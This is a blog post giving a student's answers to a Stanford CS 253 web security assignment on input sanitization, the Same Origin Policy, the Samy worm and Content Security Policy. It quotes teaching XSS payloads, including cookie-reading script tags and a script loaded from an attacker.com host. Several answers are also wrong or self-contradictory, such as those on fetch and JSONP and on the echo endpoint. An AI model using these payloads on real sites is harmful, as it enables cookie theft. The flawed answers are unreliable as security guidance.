dmitry | Dec. 28, 2020, 11:57 a.m.
Here are some answers for Stanford's CS 253 Assignment 2 that the course's instructor has kindly made publicly available on the course's website.
You and a friend built a site that accepts and displays user-generated content. You recently read the XKCD comic about code injection which made you realize that you're not sanitizing user-submitted data anywhere in your web app. You realize that you're almost certainly vulnerable to Cross site scripting (XSS) and SQL injection attacks – yikes!
Rereading the comic, you notice it ends with the phrase "I hope you've learned to sanitize your database inputs". Your friend suggests solving the issue by escaping all user-submitted data before inserting it into the database. Your friend argues that by sanitizing the inputs to the database as the comic suggests, the data can then be extracted from the database and safely used in HTML and SQL without further escaping. Is this a valid argument? Why or why not?
The relevant principles are that user inputs should never be trusted and that perfect input sanitization is just too tricky to get right to begin with, especially given all the layers that interact with the inputs. You'd then need to keep getting it right as new attacks, bugs and updates emerge. Do not trust user inputs and use parameterized SQL calls instead. Parameterized SQL calls separate the retrieval of data from the operation of tasks on the retrieved data. In addition, data extracted from a database should be escaped (aka converted to a form that cannot be mistaken for code) using a method that takes into account the context of how this data will be used.
Sources:
1. https://bobby-tables.com/about
2. https://kevinsmith.io/sanitize-your-inputs)
You and a friend decide to build an internal dashboard that will show real-time HTTP requests that are being sent by visitors to your site. The dashboard displays information about each HTTP request received by the web server, including the client's IP address, HTTP method, URL, query parameters, referrer URL, and user agent name. Incidentally, this is the exact set of information that most popular web servers like Nginx or Apache print into the server log files. Here is what one line from such a log file looks like:
12.34.56.78 - - [17/Oct/2019:05:01:59 +0000] "GET /api/midi/search?q=hi&page=0 HTTP/1.0" 200 178 "https://example.com/search?q=h" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"
The internal dashboard will only be used by you and your friend and will not be exposed to the broader internet since the logs reveal information about your site visitors. Your friend argues that there is no need to worry about XSS vulnerabilities in an internal-only dashboard since neither of you would create an XSS attack to use against the other. Given that, they see no way that an XSS attack could occur. Is this a valid argument? Why or why not?
The internal dashboard will still be vulnerable to command injection, specifically through manipulation of the search parameters. Outside user input is explicitly trusted in this example which is the source of the vulnerability. Potential consequences could be the transmission of unauthorized commands that amend the internal dashboard or perhaps even change the web server configuration.
Name a real-world case where adherence to the Robustness principle
(a.k.a. Postel's law) caused a system to have worse security. Explain
how the Robustness principle led to the system having worse security
properties.
The Robustness principle can be summarized to state that programs receiving data should accept as many types of data as possible, while programs sending data should only send necessary data (where necessary is dictated by specifications).
An example could be the Samy worm that exploited the fact that certain browsers allowed JavaScript code to be inserted within CSS tags. Samy Kamkar was then able to cleverly evade any restrictions MySpace had placed on editing user profiles (at the same time MySpace had been tolerating some customization by choice) to make his own profile the initial host of a self-propagating worm. Anybody who viewed his profile would cause the execution of the worm's payload and also transfer a copy of this payload to their own profile.
The ability to customize your MySpace originated from a bug by their developers, which they then chose not to fix, instead trusting that their users knew best. Subsequent social networks like Facebook took a different approach and put in place a much more standardized system for user profile customization that did not comply with the robustness principle.
Sources:
1. https://samy.pl/myspace/tech.html
2. https://tedium.co/2020/07/14/social-media-customization-failings/
Name three ways that the Same Origin Policy protects a website.
The SOP prevent website scripts on one domain from accessing data from sensitive, authenticated sessions in a different domain.
Can JavaScript code running on attacker.com cause a GET request to be sent to victim.com?
The request can be sent, but the browser will block attacker.com from reading the raw response from victim.com. Any requested scripts will be run within the environment of attacker.com.
Source:
1. https://gracefulsecurity.com/sop-same-origin-policy-basics/
Can JavaScript code running on attacker.com use the fetch()
API to send a GET request to victim.com and read the HTTP response body? Assume no CORS headers are present on the response.
This can be done by placing the fetch API call within a script tag placed on attacker.com and using the JSONP technique, which was specifically designed to evade cross-origin data sharing issues.
Can JavaScript code running on attacker.com submit a form via a POST request to victim.com?
SOP does not block attacker.com from sending HTTP requests to victim.com so this would work.
A fascinating Same origin policy "bypass" was described in "Cross-Origin JavaScript Capability Leaks: Detection, Exploitation, and Defense", a talk at USENIX '09 (one of the top security conferences). How could an attacker use this browser implementation bug to bypass the same origin policy? What was the key, underlying reason for the bug? What was the proposed mitigation?
The underlying cause of the bug is due to the DOM and the JavaScript engine enforcing the same origin policy using two different security models (reference monitor preventing website from accessing resources allocated to another website vs object-capability discipline that prevents one website from obtaining JavaScript pointers to sensitive objects that belong to a foreign security origin).
An attacker can exploit this when a malicious script gets a JavaScript pointer to a victim's JavaScript object. The victim's JavaScript object can be used to obtain a pointer to the prototype of this object. This pointer to the prototype can be used to call the DOM APIs with unexpected arguments that can result in the execution of malicious scripts.
This can be mitigated by adding access control checks throughout the JavaScript engine or by adopting an object-capability discipline throughout the DOM (in other words make the security models in the DOM and JavaScript Engine the same).
Content Security Policy (CSP) is one of the best ways to protect your site against XSS. A properly written CSP can completely protect your site from reflected and stored XSS attacks, even in the presence of a bug that allows the attacker to add their own HTML code to the site. An attacker takes advantage of a vulnerability in your site to inject an XSS payload into the HTML page sent by your server. Fortunately, you set up a CSP in case this happened because you follow a defense-in-depth security approach. Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self';
<script>alert(document.cookie)</script>
This CSP will only allow JavaScript code to be executed from the same origin as the HTML page from the victim server, so the code will not execute because the JavaScript within the script tag is inline rather than coming from the same origin as the HTML page. Inline scripts are always blocked by default.
Would the following CSP prevent the XSS attack?
Content-Security-Policy:
default-src *; script-src 'self';
<script>alert(document.cookie)</script>
The 'default-src' does not influence the directive for 'script-src', so there will be no difference with #9. Otherwise, if any other type of media or data is attempted to be loaded it will be checked to see if it comes from the same origin as the HTML page.
Would the following CSP prevent the XSS attack?
Content-Security-Policy:
default-src 'none'; script-src 'self' 'unsafe-eval'; connect-src 'self'; img-src 'self'; style-src 'self';
<script>alert(document.cookie)</script>
The addition of the 'unsafe-eval' keyword to the 'script-src' directive will still not allow for the inline JavaScript code to run.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval'; connect-src 'self'; img-src 'self'; style-src 'self';
<script>eval('alert(document.cookie)')</script>
The addition of 'unsafe-eval' to the 'script-src' directive will now allow for the XSS attack to happen because the inline script has now been placed inside of an 'eval' function. 'Eval' calls are blocked by default due to their malicious potential as an attack vector for malicious code.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src *; script-src 'self'; connect-src *; img-src *; style-src *;
<script src='https://attacker.com/xss.js'></script>
The script tag is pointing to a website that is on a different origin to the HTML page being served. The 'self' in the 'script-src' directive only allows for same origin JavaScript code to be executed.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: default-src 'none'; script-src 'self' https:; connect-src 'none'; img-src 'none'; style-src 'none';
<script src='https://attacker.com/xss.js'></script>
The script tag is pointing to a website that is on a different origin to the HTML page being served. The 'self' keyword in the 'script-src' directive allows for same origin JavaScript code to be executed and for JavaScript code to be executed from any website that is using the HTTPS protocol.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh';
<script>alert(document.cookie)</script>
One mechanism that can be used to allow inline scripts is to identify a script with a nonce and then include that nonce in the 'script-src' directive of the CSP. In this example, the 'script-src' directive includes a nonce, but this nonce is not included in the script tag. Since the 'script-src' also only allows JavaScript to be run if it comes from the same source as the HTTP page, the inline code will not run (inline code remains blocked by default).
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh';
<script nonce='xss'>alert(document.cookie)</script>
Same as #15, since there is mismatch in the nonce identifiers between the CSP's 'script-src' directive and the script tag (xss!=R28gU3RhbmZvcmQh).
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self' 'nonce-R28gU3RhbmZvcmQh' 'unsafe-inline';
<script nonce='xss'>alert(document.cookie)</script>
The CSP will not prevent the XSS attack since the unsafe-inline keyword is included in the 'script-src' directive. unsafe-inline allows for all inline JavaScript script blocks to be executed, whereas the use of nonce or hash sources allows for specific inline script blocks to be executed.
Would the following CSP prevent the XSS attack?
Content-Security-Policy: script-src 'self';
<script src='/api/echo?str=alert(document.cookie)'></script>
Since the API endpoint is on the victim server, the script block will execute since the CSP 'script-src' directive allows for script tags to be executed when the JavaScript code originates from the same source as the HTML page being served. The result of the code's execution will be an HTTP response with a body of alert(document.cookie).
alert(document.cookie) will be interpreted as plain text, so it will not execute in the user's browser.
Assume that victim.com is protected with the following CSP:
Content-Security-Policy: script-src 'self' 'nonce-<nonce-value-here>';
The operator of attacker.com attempts to subvert victim.com's CSP by visitng victim.com and copying the nonce they observe in the CSP header into their XSS attack payload:
<script nonce='<nonce-value-here>'>alert(document.cookie)</script>
Would the CSP prevent the XSS attack?
(Assume that victim.com has properly implemented their CSP nonces.)
This XSS attack should work since CSP will match the nonce values and allow for the script block to execute even if it has inline code. The only way to prevent this would be to find a way to dynamically change the nonce value so that the attacker would have no way of knowing it.
Source:
1. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
Read the paper "CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy". Explain the problem that 'strict-dynamic'
keyword solves.
The paper's first conclusion is that the vast majority of CSP policies being deployed by Internet hosts can be bypassed by automated methods. This is because either inline scripts are allowed, or scripts from arbitrary external hosts are allowed or because of policy misconfigurations (including whitelisting origins with unsafe endpoints).
The paper suggests replacing script execution URL whitelists with a nonce-based policy where scripts are executed only where their nonce identifier matches a nonce listed in the CSP. The 'strict-dynamic' keyword will allow for dynamically generated scripts to inherit a nonce from the script that created them.
I find answers for questions nobody else has time to answer and to help me remember, I write them dowm here!